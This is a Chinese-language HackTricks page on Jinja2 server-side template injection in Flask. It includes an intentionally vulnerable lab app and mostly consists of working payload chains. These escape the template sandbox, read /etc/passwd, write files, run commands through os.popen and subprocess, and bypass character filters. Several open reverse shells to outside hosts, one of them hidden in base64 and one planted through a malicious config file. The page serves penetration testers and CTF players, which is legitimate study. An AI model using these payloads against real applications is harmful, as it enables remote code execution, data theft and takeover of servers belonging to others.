# Jinja2 SSTI
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
支持HackTricks的其他方式:
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
## **实验**
```python
from flask import Flask, request, render_template_string
app = Flask(__name__)
@app.route("/")
def home():
if request.args.get('c'):
return render_template_string(request.args.get('c'))
else:
return "Hello, send someting inside the param 'c'!"
if __name__ == "__main__":
app.run()
```
## **其他**
### **调试语句**
如果启用了调试扩展,将会提供一个`debug`标签,用于转储当前上下文以及可用的过滤器和测试。这对于查看模板中可用的内容而无需设置调试器非常有用。
```python
{% debug %}
```
### **转储所有配置变量**
源链接:
```python
{{ config }} #In these object you can find all the configured env variables
{% for key, value in config.items() %}
{{ key|e }}
{{ value|e }}
{% endfor %}
```
## **Jinja注入**
首先,在Jinja注入中,您需要找到一种方法来**逃离沙盒**并恢复访问常规的Python执行流程。为此,您需要**滥用**来自**非沙盒环境**但在沙盒中可访问的**对象**。
### 访问全局对象
例如,在代码`render_template("hello.html", username=username, email=email)`中,对象username和email**来自非沙盒的Python环境**,并将在**沙盒环境内**可访问。\
此外,还有其他对象将**始终可以从沙盒环境中访问**,这些对象包括:
```
[]
''
()
dict
config
request
```
### 恢复\
然后,从这些对象中,我们需要到达类:**``**,以便尝试**恢复**定义的**类**。这是因为从这个对象中,我们可以调用\*\*`__subclasses__`**方法并**访问来自非沙盒\*\*python环境的所有类。
为了访问那个**对象类**,您需要**访问一个类对象**,然后访问\*\*`__base__`**,**`__mro__()[-1]`**或**`mro()[-1]`**。然后,在到达这个**对象类**之后,我们**调用\*\* **`__subclasses__()`**。
请查看这些示例:
```python
# To access a class object
[].__class__
''.__class__
()["__class__"] # You can also access attributes like this
request["__class__"]
config.__class__
dict #It's already a class
# From a class to access the class "object".
## "dict" used as example from the previous list:
dict.__base__
dict["__base__"]
dict.mro()[-1]
dict.__mro__[-1]
(dict|attr("__mro__"))[-1]
(dict|attr("\x5f\x5fmro\x5f\x5f"))[-1]
# From the "object" class call __subclasses__()
{{ dict.__base__.__subclasses__() }}
{{ dict.mro()[-1].__subclasses__() }}
{{ (dict.mro()[-1]|attr("\x5f\x5fsubclasses\x5f\x5f"))() }}
{% with a = dict.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}
# Other examples using these ways
{{ ().__class__.__base__.__subclasses__() }}
{{ [].__class__.__mro__[-1].__subclasses__() }}
{{ ((""|attr("__class__")|attr("__mro__"))[-1]|attr("__subclasses__"))() }}
{{ request.__class__.mro()[-1].__subclasses__() }}
{% with a = config.__class__.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}
# Not sure if this will work, but I saw it somewhere
{{ [].class.base.subclasses() }}
{{ ''.class.mro()[1].subclasses() }}
```
### RCE Escaping
**已经恢复** `` 并调用 `__subclasses__`,现在我们可以使用这些类来读取和写入文件并执行代码。
调用 `__subclasses__` 给了我们机会**访问数百个新函数**,我们将很高兴只是通过访问**文件类**来**读取/写入文件**或任何具有访问**允许执行命令**的类的类(如 `os`)。
**读取/写入远程文件**
```python
# ''.__class__.__mro__[1].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
```
**远程代码执行(RCE)**
```python
# The class 396 is the class
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
# Without '{{' and '}}'
a
# Calling os.popen without guessing the index of the class
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
## Passing the cmd line in a GET param
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
## Passing the cmd line ?cmd=id, Without " and '
{{ dict.mro()[-1].__subclasses__()[276](request.args.cmd,shell=True,stdout=-1).communicate()[0].strip() }}
```
了解更多可用于逃逸的**更多类**,您可以**检查**:
{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes" %}
[bypass-python-sandboxes](https://hacktricks.xsx.tw/generic-methodologies-and-resources/python/bypass-python-sandboxes)
{% endcontent-ref %}
### 过滤绕过
#### 常见绕过
这些绕过将允许我们**访问**对象的**属性**,而无需使用某些字符。\
我们已经在先前的示例中看到了一些这些绕过的情况,但让我们在这里总结一下:
```bash
# Without quotes, _, [, ]
## Basic ones
request.__class__
request["__class__"]
request['\x5f\x5fclass\x5f\x5f']
request|attr("__class__")
request|attr(["_"*2, "class", "_"*2]|join) # Join trick
## Using request object options
request|attr(request.headers.c) #Send a header like "c: __class__" (any trick using get params can be used with headers also)
request|attr(request.args.c) #Send a param like "?c=__class__
request|attr(request.query_string[2:16].decode() #Send a param like "?c=__class__
request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join) # Join list to string
http://localhost:5000/?c={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ #Formatting the string from get params
## Lists without "[" and "]"
http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
# Using with
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
```
* [**点击此处查看更多访问全局对象的选项**](#accessing-global-objects)
* [**点击此处查看更多访问对象类的选项**](#recovering-less-than-class-object-greater-than)
* [**阅读此内容以在没有对象类的情况下获得RCE**](#jinja-injection-without-less-than-class-object-greater-than)
**避免HTML编码**
默认情况下,Flask会对模板中的所有内容进行HTML编码,以确保安全性:
```python
{{''}}
#will be
<script>alert(1);</script>
```
**`safe`** 过滤器允许我们将 JavaScript 和 HTML 注入到页面中,而**无需**对其进行**HTML 编码**,就像这样:
```python
{{''|safe}}
#will be
```
**通过编写恶意配置文件实现远程代码执行(RCE)。**
```python
# evil config
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
# load the evil config
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}
# connect to evil host
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
```
## 没有几个字符
没有 **`{{`** **`.`** **`[`** **`]`** **`}}`** **`_`**
```python
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}
```
## 无需使用 **\** 的 Jinja 注入
从[**全局对象**](#accessing-global-objects)中有另一种方法可以实现 **RCE 而无需使用该类。**\
如果你设法访问到这些全局对象中的任何 **函数**,你将能够访问 **`__globals__.__builtins__`**,从那里 **RCE** 就非常 **简单**。
你可以通过以下方式从对象 **`request`**、**`config`** 和任何其他你可以访问的有趣的 **全局对象** 中 **找到函数**:
```bash
{{ request.__class__.__dict__ }}
- application
- _load_form_data
- on_json_loading_failed
{{ config.__class__.__dict__ }}
- __init__
- from_envvar
- from_pyfile
- from_object
- from_file
- from_json
- from_mapping
- get_namespace
- __repr__
# You can iterate through children objects to find more
```
一旦找到了一些函数,您可以使用以下方法恢复内置函数:
```python
# Read file
{{ request.__class__._load_form_data.__globals__.__builtins__.open("/etc/passwd").read() }}
# RCE
{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("ls").read() }}
{{ config.__class__.from_envvar["__globals__"]["__builtins__"]["__import__"]("os").popen("ls").read() }}
{{ (config|attr("__class__")).from_envvar["__globals__"]["__builtins__"]["__import__"]("os").popen("ls").read() }}
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("ls")["read"]() %} {{ a }} {% endwith %}
## Extra
## The global from config have a access to a function called import_string
## with this function you don't need to access the builtins
{{ config.__class__.from_envvar.__globals__.import_string("os").popen("ls").read() }}
# All the bypasses seen in the previous sections are also valid
```
## 参考资料
*
* 检查[此处的attr技巧以绕过被列入黑名单的字符](https://hacktricks.xsx.tw/generic-methodologies-and-resources/python/bypass-python-sandboxes#python3)。
*
*
从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。